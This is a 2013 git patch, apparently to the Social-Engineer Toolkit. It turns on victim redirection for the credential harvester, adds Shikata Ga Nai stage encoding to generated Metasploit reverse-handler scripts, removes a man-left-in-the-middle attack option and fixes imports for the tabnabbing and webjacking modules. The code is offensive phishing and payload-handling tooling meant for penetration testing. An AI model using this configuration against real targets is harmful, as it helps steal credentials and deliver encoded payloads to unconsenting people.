From 470295a861c0efb82e72183ba9538bcc0077493f Mon Sep 17 00:00:00 2001 From: TrustedSec Date: Thu, 18 Apr 2013 17:54:59 -0400 Subject: [PATCH] Added new features to second stage encoding from Metasploit --- config/set_config | 2 +- readme/CHANGES | 7 +++++++ src/core/payloadgen/create_payloads.py | 3 ++- src/core/set.py | 24 ++++++------------------ src/core/setcore.py | 2 +- 5 files changed, 17 insertions(+), 21 deletions(-) diff --git a/config/set_config b/config/set_config index d926fb443..e37f3e956 100644 --- a/config/set_config +++ b/config/set_config @@ -180,7 +180,7 @@ UPX_PATH=/usr/bin/upx ### This feature will turn on or off the automatic redirection. By default for example in multi-attack ### the site will redirect once one successful attack is used. Some people may want to use Java applet ### and credential harvester for example. -AUTO_REDIRECT=OFF +AUTO_REDIRECT=ON # ### This will redirect the harvester victim to this website once executed and not to the original website. ### For example if you clone abcompany.com and below it says blahblahcompany.com, it will redirect there instead. diff --git a/readme/CHANGES b/readme/CHANGES index 9a3b868dd..198e9ae0b 100644 --- a/readme/CHANGES +++ b/readme/CHANGES @@ -1,3 +1,10 @@ +~~~~~~~~~~~~~~~~ +version 5.0.3 +~~~~~~~~~~~~~~~~ + +* added set EnableStageEncoding true to default to encode the second stage with Shikata Ga Nai +* fixed an issue that would cause webjacking to go back to the mlitm + ~~~~~~~~~~~~~~~~ version 5.0.2 ~~~~~~~~~~~~~~~~ diff --git a/src/core/payloadgen/create_payloads.py b/src/core/payloadgen/create_payloads.py index b8466dd47..3d610b500 100644 --- a/src/core/payloadgen/create_payloads.py +++ b/src/core/payloadgen/create_payloads.py @@ -419,7 +419,7 @@ try: filewrite = file("%s/meta_config_multipyinjector" % (setdir), "a") port_check = check_ports("%s/meta_config_multipyinjector" % (setdir), shellcode_port) if port_check == False: - filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (choice9,shellcode_port)) + filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (choice9,shellcode_port)) filewrite.close() if validate_ip(choice2) == False: @@ -670,6 +670,7 @@ try: if flag == 0: filewrite.write("set LPORT "+choice3+"\n") + filewrite.write("set EnableStageEncoding true\n") filewrite.write("set ExitOnSession false\n") if auto_migrate == "ON": diff --git a/src/core/set.py b/src/core/set.py index a43afcaf7..e3dfb39cc 100755 --- a/src/core/set.py +++ b/src/core/set.py @@ -161,10 +161,8 @@ try: return_continue() break - # Web Attack menu choice 5: Man Left in the Middle Attack Method - if attack_vector == "5": - choice3 = '0' - if attack_vector != "5": + # Removed to delete MLITM + if attack_vector != "99999": ################################################### # USER INPUT: SHOW WEB ATTACK VECTORS MENU # @@ -383,17 +381,16 @@ try: # cred harvester for auto site here if attack_vector == "harvester" or attack_vector == "tabnabbing" or attack_vector == "webjacking": if attack_vector == "tabnabbing" or attack_vector == "webjacking": - sys.path.append("src/webattack/tabnabbing") debug_msg(me, "importing 'src.webattack.tabnabbing.tabnabbing'", 1) - try:reload(tabnabbing) - except: import tabnabbing + try:reload(src.webattack.tabnabbing) + except: import src.webattack.tabnabbing # start web cred harvester here sys.path.append("src/webattack/harvester") debug_msg(me, "importing 'src.webattack.harvester.harvester'", 1) try: - reload(harvester) + reload(src.webattack.harvester) except: - import harvester + import src.webattack.harvester # if we are using profiler lets prep everything to get ready if attack_vector == "profiler": @@ -682,15 +679,6 @@ try: import src.webattack.multi_attack.multiattack - # option for thebiz man left in the middle attack vector - if choice3 == '0': - sys.path.append("src/webattack/mlitm") - debug_msg(me, "importing 'src.webattack.mlitm.thebiz'", 1) - try: - reload(thebiz) - except: - import thebiz - # Return to main menu if choice3 == '4': print (" Returning to main menu.\n") diff --git a/src/core/setcore.py b/src/core/setcore.py index 1de8a60fe..9fba02f3e 100644 --- a/src/core/setcore.py +++ b/src/core/setcore.py @@ -229,7 +229,7 @@ def print_error(message): print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC def get_version(): - define_version = '5.0.2' + define_version = '5.0.3' return define_version class create_menu: